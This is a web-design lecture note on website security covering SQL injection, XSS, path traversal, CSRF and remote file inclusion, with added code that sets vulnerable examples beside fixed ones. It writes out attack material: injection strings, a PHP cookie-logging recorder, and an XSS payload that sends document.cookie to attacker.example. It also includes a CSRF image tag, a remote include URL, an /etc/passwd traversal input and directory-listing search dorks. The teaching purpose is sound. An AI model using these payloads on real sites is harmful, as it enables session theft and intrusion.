Website Security

A Web Design Lecture by Steven Choy

Overview: SQL Injection - Cross Site Scripting (XSS) - Path Traversal - Cross-Site Request Forgery - Remote File Inclusion (RFI)


Introduction

"Website security is an interesting topic and should be high on the radar of anyone who has a Web presence under their control. Ineffective Web security leads to all of the things that make us hate the Web: spam, viruses, identity theft, to name a few."

SQL Injection

  • Description
"SQL Injection involves entering SQL code into web forms or into the browser address field to access and manipulate the database behind the site, system or application."
"It is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance when a user logs in: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else."
  • How is it possible?
The server-side program accepts the user's input without validating or escaping it and pastes that input into the text of the SQL query it then executes. Because the query is assembled as a string, a quote or comment sequence in the input changes the structure of the query instead of being treated as data.
  • Examples
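The lecture leaves this heading empty, so here is an added worked example (written for this note, not taken from the lecture; in Python with an in-memory SQLite table rather than the lecture's PHP, because the mechanism is the same in any language). The user table and the two inputs are constructed for the example. The vulnerable login pastes the user's input into the query text; the safe version uses a parameterised query so the same inputs are compared as plain strings.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def build_query_vulnerable(name, password):
    """The mistake the lecture describes: user input pasted into the SQL text."""
    return ("SELECT COUNT(*) FROM users WHERE name = '" + name +
            "' AND password = '" + password + "'")


def login_vulnerable(db, name, password):
    return db.execute(build_query_vulnerable(name, password)).fetchone()[0] > 0


def login_safe(db, name, password):
    """Parameterised query: the values travel separately from the SQL text, so a
    quote in the input is just a character in a string, never SQL syntax."""
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (name, password)).fetchone()[0] > 0


# Constructed inputs: a tautology in the password field, and a comment sequence
# in the name field that cuts the password check off the end of the query.
TAUTOLOGY = "' OR '1'='1"
COMMENT_OUT = "alice'--"


def demo():
    db = make_db()
    return {
        "vuln_right_password": login_vulnerable(db, "alice", "s3cret"),
        "vuln_wrong_password": login_vulnerable(db, "alice", "wrong"),
        "vuln_tautology": login_vulnerable(db, "alice", TAUTOLOGY),
        "vuln_comment": login_vulnerable(db, COMMENT_OUT, "anything"),
        "safe_right_password": login_safe(db, "alice", "s3cret"),
        "safe_tautology": login_safe(db, "alice", TAUTOLOGY),
        "safe_comment": login_safe(db, COMMENT_OUT, "anything"),
    }


if __name__ == "__main__":
    print(build_query_vulnerable("alice", TAUTOLOGY))
    for case, result in demo().items():
        print(case, result)
```

With the tautology the vulnerable query ends in `AND password = '' OR '1'='1'`, which is true for every row, so the login succeeds without a password; with `alice'--` the rest of the query becomes a comment. The parameterised version rejects both, because the driver never lets the input touch the SQL grammar.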

Cross Site Scripting (XSS)

  • Description
"XSS is about malicious (usually) JavaScript routines embedded in hyperlinks, which are used to hijack sessions, hijack ads in applications and steal personal information."
  • How is it possible?
The server-side program takes the user's input without validating or encoding it and echoes that input into the HTML it sends back (in the demonstration below, into a style block). Whatever the input contains is therefore rendered by the browser as part of the page, including any script.
  • Example (with class demonstration):
Step 1: Find an XSS hole. In the page below, the color and background query parameters are echoed into the style block without any escaping or validation:
      <?php
        $color = 'white';
        $background = 'black';
        if(isset($_GET['color'])){
          $color = $_GET['color'];
        }
        if(isset($_GET['background'])){
          $background = $_GET['background'];
        }
      ?>

      <style type="text/css" media="screen">
        #intro{
          color:<?php echo $color; ?>;
          background:<?php echo $background;?>;
          font-family:helvetica,arial,sans-serif;
          font-size:200%;
          padding:10px;
        }
      </style>

      <p id="intro">Cool intro block, customizable, too!</p>
Step 2: Prepare a program that records whatever the injected script sends. This one appends the request time, the victim's IP address and the value of the cookie parameter to a text file:
      <?php
        $ip = $_SERVER['REMOTE_ADDR'];
        $value = $_GET['cookie'];        // the value the injected script passes on
        $time = date("F j, Y, g:i a");
        $myFile = "record20110218.txt";
        $fh = fopen($myFile, 'a');
        fwrite($fh, $time." - ".$ip." - ".$value."\n");
        fclose($fh);
      ?>
Step 3: Craft a hyperlink to the vulnerable page whose color (or background) parameter carries JavaScript instead of a colour value. Because the value is echoed unescaped, the script becomes part of the page; the link is then passed to the victim.
Step 4: When the victim clicks the hyperlink, the page loads with the injected JavaScript, which sends the victim's information (for example the session cookie) to the program prepared in Step 2.
  • More example:
XSS Video (10 minutes)
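The four steps above, as an added example that is not part of the lecture (Python rather than the lecture's PHP, so that it can be run without a web server). The page fragment, the payload and the host name attacker.example are constructed for the example; the recorder script name record.php is hypothetical. The vulnerable renderer does what the PHP in Step 1 does; the safe renderer validates the parameter as a colour before placing it in the style block, and a second helper shows that for text in an HTML element body, escaping is the right tool instead.

```python
import html
import re

DEFAULT_COLOR = "white"


def render_intro_vulnerable(color):
    """Same mistake as the lecture's PHP: the query-string value is echoed into
    the style block exactly as received."""
    return ('<style type="text/css" media="screen">\n'
            "  #intro{ color:" + color + "; }\n"
            "</style>\n"
            '<p id="intro">Cool intro block, customizable, too!</p>')


# In a CSS value position the right defence is validation against the expected
# format, not HTML escaping: a colour is a keyword or a #rgb / #rrggbb value.
CSS_COLOR = re.compile(r"^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$")


def render_intro_safe(color):
    if not CSS_COLOR.match(color or ""):
        color = DEFAULT_COLOR          # anything that is not a colour is dropped
    return ('<style type="text/css" media="screen">\n'
            "  #intro{ color:" + color + "; }\n"
            "</style>\n"
            '<p id="intro">Cool intro block, customizable, too!</p>')


def render_comment_safe(text):
    """For text that belongs in an HTML element body, escaping the HTML
    metacharacters keeps it from being parsed as markup."""
    return "<p>" + html.escape(text, quote=True) + "</p>"


# Constructed payload of the kind Step 3 describes: it closes the style block
# and adds a script that reports document.cookie to a recorder like the one in
# Step 2. attacker.example and record.php are hypothetical.
PAYLOAD = ("red</style><script>new Image().src="
           "'http://attacker.example/record.php?cookie='+document.cookie</script>")


def has_script(page):
    """True if the rendered page contains a script element."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(render_intro_vulnerable(PAYLOAD))   # the script survives into the page
    print(render_intro_safe(PAYLOAD))         # falls back to color:white
```

The payload would reach the victim as the value of the color parameter in a link to the page. Note that the hardened renderer does not escape the value; it checks that the value has the shape of a colour, because a CSS value position accepts constructs that HTML escaping does not touch.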

Path Traversal

  • Description
"Allowing for path or directory traversal on your server is an amazingly bad idea. You would be allowing people to list the folders on your server and to navigate from folder to folder. This allows attackers to go to folders with sensitive information or website functionality and have some fun."
  • How is it possible?
In the document root of a website, many folders hold the site's content. When a folder contains no index file (index.html, index.php, etc.) and the web server has directory listing enabled, the server generates a listing of that folder for any visitor, who can then browse from folder to folder and open whatever is stored there. The same name is used for the case where a script builds a file path from user input and the input contains ../ to step out of the intended folder; the RFI example later in this note has that shape.
  • Example: try the following Google searches
      "index of /photos"

      intitle:index.of mp3 -html -htm -php -asp -txt -pls

      "index of"  Last modified site:.hk

Cross-Site Request Forgery (CSRF)

  • Description
"Cross-site request forgery (CSRF) exploits browsers and websites that allow for functionality to be called without really knowing that an actual user initiated it."
"CSRF becomes even more dangerous when you are logged into and authenticated by a particular system. An image in any other tab in your browser could execute a money transfer, read your emails and send them on and many other evil things."
  • How is it possible?
The server-side program does not verify that the request was deliberately made by the user from the site's own pages. It acts on any request that carries the user's session cookie, and the browser attaches that cookie automatically even when the request was triggered by an element on another site.
  • Example:
      <h1>Hello! This is CSRF testing</h1>
      <img src="http://example.com/csrf.php?id=xxyyzz" width="1" height="1">
      <p>Please view the source code to see the evil embedded!</p>
Anybody visiting the above web page would now be casting another vote in your database (csrf.php being the page that records a vote), without ever seeing example.com. Any element that makes the browser load a URI when the HTML renders will do: an image, a CSS link, a script. In CSS, this could be a background image.
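The attack above and a hardened handler, as an added example that is not part of the lecture (Python rather than PHP, with the site, browser and voting page modelled in memory so it runs without a server). VoteApp stands in for the site behind http://example.com/csrf.php; the candidate id xxyyzz is the one from the page above. The vulnerable handler accepts any request with a valid cookie, which is exactly what the image tag exploits; the hardened handler requires POST and a per-session token that a page on another origin cannot read.

```python
import hmac
import secrets


class VoteApp:
    """Constructed stand-in for the site behind http://example.com/csrf.php."""

    def __init__(self):
        self.sessions = {}   # session cookie -> per-session CSRF token
        self.votes = {}      # candidate id -> number of votes

    def login(self):
        """Log a user in; the browser attaches this cookie to every request to the site."""
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = secrets.token_hex(16)
        return cookie

    def vote_vulnerable(self, cookie, candidate):
        """Like the lecture's csrf.php: a valid cookie is all it checks, so a request
        the browser made on behalf of another site looks exactly like a real one."""
        if cookie not in self.sessions:
            return 401
        self.votes[candidate] = self.votes.get(candidate, 0) + 1
        return 200

    def vote_safe(self, cookie, candidate, method, token):
        """Hardened handler: state changes only via POST, and only with the
        per-session token that the site's own form embedded in the page."""
        expected = self.sessions.get(cookie)
        if expected is None:
            return 401
        if method != "POST":
            return 405                    # <img>, <link> and CSS can only issue GET
        if token is None or not hmac.compare_digest(token, expected):
            return 403                    # another origin cannot read the token
        self.votes[candidate] = self.votes.get(candidate, 0) + 1
        return 200


def cross_site_image(app, victim_cookie, candidate, hardened):
    """Models <img src="http://example.com/csrf.php?id=..."> on an attacker's page:
    the browser issues a GET carrying the victim's example.com cookie, and the
    attacker's page has no way to supply the token."""
    if hardened:
        return app.vote_safe(victim_cookie, candidate, method="GET", token=None)
    return app.vote_vulnerable(victim_cookie, candidate)


def legitimate_vote(app, cookie, candidate):
    """The site's own voting form: it posts the token the server placed in the page."""
    token = app.sessions[cookie]
    return app.vote_safe(cookie, candidate, method="POST", token=token)


if __name__ == "__main__":
    app = VoteApp()
    victim = app.login()
    print(cross_site_image(app, victim, "xxyyzz", hardened=False), app.votes)
    print(cross_site_image(app, victim, "xxyyzz", hardened=True), app.votes)
    print(legitimate_vote(app, victim, "xxyyzz"), app.votes)
```

The token is compared with hmac.compare_digest so that a guessed token cannot be confirmed byte by byte through timing. Modern browsers also let the site mark the cookie SameSite so it is not attached to requests triggered from other sites, which is a second, independent layer; the token check remains the one the server controls.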

Remote File Inclusion (RFI)

  • Description
"Remote file inclusion, or RFI, involves an attack from a remote location that exploits a vulnerable application and injects malicious code for the purpose of spamming or even gaining access to the root folder of the server."
"With Remote file inclusion or code injection, an attacker uses a flaw in your website to inject code from another server to run on yours."
"Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation." (from Wikipedia)
  • How is it possible?
The server-side program takes a user-supplied value as the name of another file to include and uses it without validation. Nothing restricts the value to the files the author intended, so it can name a file elsewhere on the server or, where remote includes are enabled, a URL on another server whose contents are then executed.
  • General example:
    "Imagine that at http://example.com/malice.php a file exists and our script is located at http://site.com/index.php. The attacker will do this request: http://site.com/index.php?page=http://example.com/malice. This file will get executed when it is included and it will write a new file to the disk."
  • Example:
    <?php
      $lang = 'en';
      if (isset($_GET['LANG'])) {
        $lang = $_GET['LANG'];
      }
      require($lang . '.php');
    ?>

    <form method="get">
    <select name="LANG">
    <option value="en">English</option>
    <option value="zh">Chinese</option>
    </select>
    <input type="submit">
    </form>
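The include above, and the Path Traversal section earlier in this note, share one mistake: a user-supplied value becomes a file name. Here is an added example (not the lecture's code; Python rather than PHP so that it runs stand-alone) that reproduces require($lang . '.php') on three inputs, classifies what the naive name would do, and shows the hardened version: map the input onto the fixed allowlist the form offers, then confirm the resolved path is still under the document root. The document root is a temporary directory constructed for the example; the inputs are the form's own value, a ../ traversal and the remote URL from the general example above.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import urlparse

LANGUAGES = {"en", "zh"}          # the two values the lecture's form offers


def include_path_vulnerable(lang):
    """Mirrors require($lang . '.php'): the LANG value becomes the file name unchanged."""
    return lang + ".php"


def is_remote_include(path):
    """A URL in include position is the RFI case: PHP fetches and runs it when
    allow_url_include is on."""
    return urlparse(path).scheme in ("http", "https", "ftp")


def escapes_root(base_dir, relative):
    """The path-traversal case: after resolving '..' and symlinks, the file is
    no longer under the directory it was supposed to come from."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative))
    return os.path.commonpath([base, target]) != base


def include_path_safe(base_dir, lang):
    """Hardened version: allowlist first, containment check second."""
    if lang not in LANGUAGES:
        lang = "en"                                   # unknown value: use the default
    relative = lang + ".php"
    if escapes_root(base_dir, relative):
        raise ValueError("include resolves outside the document root")
    return os.path.realpath(os.path.join(base_dir, relative))


def demo():
    base = tempfile.mkdtemp()                         # constructed document root
    for lang in LANGUAGES:
        Path(base, lang + ".php").touch()
    results = {}
    for value in ("en", "../../etc/passwd", "http://example.com/malice"):
        naive = include_path_vulnerable(value)
        results[value] = {
            "naive": naive,
            "remote": is_remote_include(naive),
            "traversal": escapes_root(base, naive),
            "safe": os.path.basename(include_path_safe(base, value)),
        }
    return results


if __name__ == "__main__":
    for value, info in demo().items():
        print(value, info)
```

The allowlist is what actually closes the hole: once the input can only become en.php or zh.php, neither a remote URL nor a ../ sequence can reach require. The containment check is the defence for the case where an allowlist is impossible, for instance when the file name really is user data. On the PHP side, leaving allow_url_include off (its default) removes the remote variant even when the application code is wrong.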

Other common security vulnerabilities

  • Authorization Bypass
Video - This is an example of how easy it is to bypass client-side security checks and hack your way in.
  • Error Reporting
"Error reporting is a great tool for diagnosing bugs and allowing you to fix them quicker and easier, but it also poses a potential security threat. The problem occurs when the error is visible to others on-screen, because it reveals possible security holes in your source code that a hacker can easily take advantage of."
  • Register_Globals
"Register_Globals makes writing PHP applications simple and convenient for the developer, but it also poses a potential security risk. When turned on, it allows unverified users to inject variables into an application to gain administrative access to your website."
Example code:
	<?php
	// define $authorized = true only if the user is authenticated
	if (authenticated_user()) {
	    $authorized = true;
	}

	// Because $authorized was not first initialised to false, it may already
	// have been set through register_globals, e.g. from GET auth.php?authorized=1,
	// so anyone can be treated as authenticated.
	if ($authorized) {
	    include "/highly/sensitive/data.php";
	}
	?>


Thanks for Reading


If you find any problem in this lecture note, please feel free to tell Steven via steven [at] findaway.hk.

Page last modified on February 17, 2011, at 10:06 AM